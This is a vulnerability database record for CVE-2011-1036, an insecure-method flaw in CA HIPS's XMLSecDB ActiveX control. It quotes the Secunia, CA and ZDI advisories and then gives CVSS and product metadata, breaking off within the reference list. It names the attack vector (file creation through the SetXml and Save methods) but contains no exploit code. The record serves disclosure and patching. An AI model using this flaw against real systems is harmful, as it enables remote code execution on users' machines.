Vulnerability from variot - Updated: 2023-12-18 13:34The XML Security Database Parser class in the XMLSecDB ActiveX control in the HIPSEngine component in the Management Server before 8.1.0.88, and the client before 1.6.450, in CA Host-Based Intrusion Prevention System (HIPS) 8.1, as used in CA Internet Security Suite (ISS) 2010, allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via vectors involving the SetXml and Save methods. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The flaw exists within the XMLSecDB ActiveX control which is installed with HIPSEngine component. SetXml and Save methods are implemented insecurely and can allow creation of an arbitrary file on the victim's system. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the user. CA Host-Based Intrusion Prevention System(HIPS) is prone to a remote code-execution vulnerability. Failed exploits result in denial-of-service conditions. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/
TITLE: CA Host-Based Intrusion Prevention System "XMLSecDB.DIParser" ActiveX Control Vulnerability
SECUNIA ADVISORY ID: SA43377
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43377/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43377
RELEASE DATE: 2011-03-13
DISCUSS ADVISORY: http://secunia.com/advisories/43377/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43377/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43377
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been discovered in CA Host-Based Intrusion Prevention System, which can be exploited by malicious people to compromise a user's system. This can be exploited to create an arbitrary file using directory traversal specifiers and supply controlled content via the "SetXml()" method.
The vulnerability is confirmed in UmxXmlSd version 1.5.0.263 and reported in the following products: * HIPS Management Server versions prior to 8.1.0.88.
SOLUTION: Apply RO26950 and set registry values. Please see the vendor's advisory for more details.
Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY: Andrea Micalizzi aka rgod via ZDI
Additional details provided by Secunia Research.
ORIGINAL ADVISORY: CA (CA20110223-01): https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}
ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-093/
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
CA20110223-01: Security Notice for CA Host-Based Intrusion Prevention System
Issued: February 23, 2011 Updated: February 24, 2011
CA Technologies support is alerting customers to a security risk associated with CA Host-Based Intrusion Prevention System (HIPS). CA Technologies has issued patches to address the vulnerability.
The vulnerability, CVE-2011-1036, is due to insecure method implementation in the XMLSecDB ActiveX control that is utilized in CA HIPS components and products.
HIPS client sources are vulnerable if the build number is less than 1.6.450.
Older versions of HIPS and ISS, that are no longer supported, may also be vulnerable.
Solution
CA has issued the following patches to address the vulnerability. You do not need to restart the client.
CA Internet Security Suite (ISS) 2010: Fix information will be published soon.
CA Internet Security Suite (ISS) 2011: Fix information will be published soon.
References
CVE-2011-1036 - CA HIPS XMLSecDB ActiveX control insecure methods
Acknowledgement
Andrea Micalizzi aka rgod, via TippingPoint ZDI
Change History
Version 1.0: Initial Release Version 1.5: Added ISS 2011 to list of affected products. Added instructions for determining if ISS is affected.
If additional information is required, please contact CA Technologies Support at https://support.ca.com.
If you discover a vulnerability in a CA Technologies product, please report your findings to the CA Technologies Product Vulnerability Response Team. support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Thanks and regards, Ken Williams, Director ca technologies Product Vulnerability Response Team ca technologies Business Unit Operations wilja22@ca.com
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.9.1 (Build 287) Charset: utf-8
wj8DBQFNZypeeSWR3+KUGYURAmbuAJ9tD5x666uOpX6ia6ksu4rdnksyggCfSwCn kb1ylRiLIRzRg3j1VygjImQ= =M+5z -----END PGP SIGNATURE----- . More details can be found at:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}
-- Disclosure Timeline: 2010-08-25 - Vulnerability reported to vendor 2011-02-23 - Coordinated public release of advisory
-- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201102-0367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 2.4,
"vendor": "ca",
"version": "8.1"
},
{
"model": "internet security suite 2011",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite 2010",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite 2010",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.7,
"vendor": "ca",
"version": null
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2011"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2010"
},
{
"model": "associates host-based intrusion prevention system r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:host-based_intrusion_prevention_system:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2010:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2011:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrea Micalizzi aka rgod",
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
],
"trust": 1.6
},
"cve": "CVE-2011-1036",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 8.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2011-1036",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2011-1036",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-48981",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-1036",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2011-1036",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201102-367",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-48981",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The XML Security Database Parser class in the XMLSecDB ActiveX control in the HIPSEngine component in the Management Server before 8.1.0.88, and the client before 1.6.450, in CA Host-Based Intrusion Prevention System (HIPS) 8.1, as used in CA Internet Security Suite (ISS) 2010, allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via vectors involving the SetXml and Save methods. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The flaw exists within the XMLSecDB ActiveX control which is installed with HIPSEngine component. SetXml and Save methods are implemented insecurely and can allow creation of an arbitrary file on the victim\u0027s system. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the user. CA Host-Based Intrusion Prevention System(HIPS) is prone to a remote code-execution vulnerability. Failed exploits result in denial-of-service conditions. ----------------------------------------------------------------------\n\n\nGet a tax break on purchases of Secunia Solutions!\n\nIf you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:\nhttp://secunia.com/products/corporate/vim/section_179/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Host-Based Intrusion Prevention System \"XMLSecDB.DIParser\" ActiveX\nControl Vulnerability\n\nSECUNIA ADVISORY ID:\nSA43377\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43377/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43377\n\nRELEASE DATE:\n2011-03-13\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43377/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43377/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43377\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been discovered in CA Host-Based Intrusion\nPrevention System, which can be exploited by malicious people to\ncompromise a user\u0027s system. This can be exploited to create an arbitrary file\nusing directory traversal specifiers and supply controlled content\nvia the \"SetXml()\" method. \n\nThe vulnerability is confirmed in UmxXmlSd version 1.5.0.263 and\nreported in the following products:\n* HIPS Management Server versions prior to 8.1.0.88. \n\nSOLUTION:\nApply RO26950 and set registry values. Please see the vendor\u0027s\nadvisory for more details. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nAndrea Micalizzi aka rgod via ZDI\n\nAdditional details provided by Secunia Research. \n\nORIGINAL ADVISORY:\nCA (CA20110223-01):\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}\n\nZDI:\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-093/\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nCA20110223-01: Security Notice for CA Host-Based Intrusion Prevention \nSystem\n\nIssued: February 23, 2011\nUpdated: February 24, 2011\n\n\nCA Technologies support is alerting customers to a security risk \nassociated with CA Host-Based Intrusion Prevention System (HIPS). CA Technologies has issued patches to address the \nvulnerability. \n\nThe vulnerability, CVE-2011-1036, is due to insecure method \nimplementation in the XMLSecDB ActiveX control that is utilized in CA \nHIPS components and products. \n\nHIPS client sources are vulnerable if the build number is less than \n1.6.450. \n\nOlder versions of HIPS and ISS, that are no longer supported, may also \nbe vulnerable. \n\n\nSolution\n\nCA has issued the following patches to address the vulnerability. You \ndo not need to restart the client. \n\nCA Internet Security Suite (ISS) 2010:\nFix information will be published soon. \n\nCA Internet Security Suite (ISS) 2011:\nFix information will be published soon. \n\n\nReferences\n\nCVE-2011-1036 - CA HIPS XMLSecDB ActiveX control insecure methods\n\n\nAcknowledgement\n\nAndrea Micalizzi aka rgod, via TippingPoint ZDI\n\n\nChange History\n\nVersion 1.0: Initial Release\nVersion 1.5: Added ISS 2011 to list of affected products. Added \ninstructions for determining if ISS is affected. \n\n\nIf additional information is required, please contact CA Technologies \nSupport at https://support.ca.com. \n\nIf you discover a vulnerability in a CA Technologies product, please \nreport your findings to the CA Technologies Product Vulnerability \nResponse Team. \nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nThanks and regards,\nKen Williams, Director\nca technologies Product Vulnerability Response Team\nca technologies Business Unit Operations\nwilja22@ca.com\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.9.1 (Build 287)\nCharset: utf-8\n\nwj8DBQFNZypeeSWR3+KUGYURAmbuAJ9tD5x666uOpX6ia6ksu4rdnksyggCfSwCn\nkb1ylRiLIRzRg3j1VygjImQ=\n=M+5z\n-----END PGP SIGNATURE-----\n. More\ndetails can be found at:\n\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}\n\n-- Disclosure Timeline:\n2010-08-25 - Vulnerability reported to vendor\n2011-02-23 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by:\n * Andrea Micalizzi aka rgod\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n http://twitter.com/thezdi\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-48981",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-48981"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-1036",
"trust": 3.7
},
{
"db": "ZDI",
"id": "ZDI-11-093",
"trust": 3.0
},
{
"db": "BID",
"id": "46539",
"trust": 1.4
},
{
"db": "SECUNIA",
"id": "43377",
"trust": 1.3
},
{
"db": "SECUNIA",
"id": "43490",
"trust": 1.3
},
{
"db": "SECTRACK",
"id": "1025120",
"trust": 1.1
},
{
"db": "VUPEN",
"id": "ADV-2011-0496",
"trust": 1.1
},
{
"db": "SREASON",
"id": "8106",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-882",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20110223 ZDI-11-093: CA INTERNET SECURITY SUITE HIPS XML SECURITY DATABASE PARSER CLASS REMOTE CODE EXECUTION VULNERABILITY",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "16511",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "98694",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "98719",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-48981",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "99241",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "99243",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "VULHUB",
"id": "VHN-48981"
},
{
"db": "BID",
"id": "46539"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "PACKETSTORM",
"id": "99241"
},
{
"db": "PACKETSTORM",
"id": "98719"
},
{
"db": "PACKETSTORM",
"id": "99243"
},
{
"db": "PACKETSTORM",
"id": "98694"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
},
{
"db": "CNNVD",
"id": "CNNVD-201102-367"
}
]
},
"id": "VAR-201102-0367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-48981"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:34:56.567000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CA20110208-01: Security Advisory for CA Secure Content Manager, Gateway Security",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7b53a608df-bfdb-4ab3-a98f-e4bb6bc7a2f4%7d"
},
{
"title": "CA has issued an update to correct this vulnerability.{53A608DF-BFDB-4AB3-A98F-E4BB6BC7A2F4}",
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-11-093"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-004302"
},
{
"db": "NVD",
"id": "CVE-2011-1036"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-093"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/46539"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/516649/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/516687/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=%7b53a608df-bfdb-4ab3-a98f-e4bb6bc7a2f4%7d"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1025120"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/43377"
},
{
"trust": 1.1,
"url": "http://secunia.com/advisories/43490"
},
{
"trust": 1.1,
"url": "http://securityreason.com/securityalert/8106"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2011/0496"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/65632"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1036"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1036"
},
{
"trust": 0.7,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid="
},
{
"trust": 0.6,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid={53a608df-bfdb-4ab3-a98f-e4bb6bc7a2f4}"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/516649/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/16511"
},
{
"trust": 0.5,
"url": "http://www.zerodayinitiative.com/advisories/zdi-11-093/"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://support.microsoft.com/kb/240797"
},
{
"trust": 0.2,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.2,
"url": "http://secunia.com/products/corporate/vim/section_179/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
